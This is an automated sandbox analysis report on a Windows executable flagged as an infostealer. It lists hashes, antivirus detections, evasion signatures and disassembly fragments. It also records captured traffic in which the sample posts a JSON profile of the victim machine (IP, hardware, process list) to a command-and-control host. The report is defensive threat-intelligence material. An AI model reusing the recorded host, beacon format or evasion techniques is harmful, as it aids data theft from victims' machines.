Windows Analysis Report
EwhnoHx0n5.exe

Overview

General Information

Sample name: EwhnoHx0n5.exe (renamed because the original name is a hash value)
Original sample name: 4c88ff06e9f5d8aaf6b642eb809dd2ff.exe
Analysis ID: 1581252
MD5: 4c88ff06e9f5d8aaf6b642eb809dd2ff
SHA1: 08af05a701deb7cb5863567cf8a63bfce814c07d
SHA256: 8fa7158a6212803480850dec0236641a4a249216778d0cef9a1d82738566af98
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EwhnoHx0n5.exe (PID: 1688 cmdline: "C:\Users\user\Desktop\EwhnoHx0n5.exe" MD5: 4C88FF06E9F5D8AAF6B642EB809DD2FF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: EwhnoHx0n5.exe | Avira: detected
Source: EwhnoHx0n5.exe | Virustotal: Detection: 58%
Source: EwhnoHx0n5.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: EwhnoHx0n5.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_0047DCF0
Source: EwhnoHx0n5.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_004BA5B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_004BB560
Source: EwhnoHx0n5.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 560227; Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 34 33 35 39 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Data Ascii (decoded here from the Data Raw bytes above; the captured body is truncated at the same point): { "ip": "8.46.123.189", "current_time": "8485909137206435916", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 },
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 31; Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d; Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 5.101.3.217
Source: Joe Sandbox View | IP Address: 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0051A8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 560227; Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 34 33 35 39 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Data Ascii (decoded here from the Data Raw bytes above; the captured body is truncated at the same point): { "ip": "8.46.123.189", "current_time": "8485909137206435916", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 },
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; Server: nginx/1.22.1; Date: Fri, 27 Dec 2024 08:07:50 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 207; Connection: close; Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; Server: nginx/1.22.1; Date: Fri, 27 Dec 2024 08:07:52 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 207; Connection: close; Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513066936.0000000001871000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: EwhnoHx0n5.exe, 00000000.00000003.1501495234.0000000001812000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512843230.0000000001815000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: EwhnoHx0n5.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: EwhnoHx0n5.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: EwhnoHx0n5.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716

System Summary

Source: EwhnoHx0n5.exe | Static PE information: section name: (empty name)
Source: EwhnoHx0n5.exe | Static PE information: section name: .idata
Source: EwhnoHx0n5.exe | Static PE information: section name: (empty name)
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004605B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00466FA0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0048F100
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0051B180
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007DE050
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007DA000
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_005200E0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004B6210
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0051C320
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007A4410
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00520420
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045E620
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0051C770
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007B6730
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007D4780
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00464940
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045A960
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0050C900
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00626AC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0070AAC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_005E4B60
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0070AB2C
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007C8BF0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0045CBB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007DCC90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007D4D40
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00610D80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007CCD80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0076AE30
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00474F70
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_0051EF90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00518F90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007A2F90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_004610E6
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007BD430
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007C35B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007E17A0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00509880
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007A9920
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007D3A70
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00491BE0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007C1BD0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_007B7CC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00709C80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00465DB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00463ED0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: 0_2_00475EB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 0046CD40 appears 80 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 004575A0 appears 704 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 00607220 appears 103 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 0046CCD0 appears 54 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 005344A0 appears 76 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 004573F0 appears 113 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 004950A0 appears 101 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe | Code function: String function: 0045C960 appears 37 times
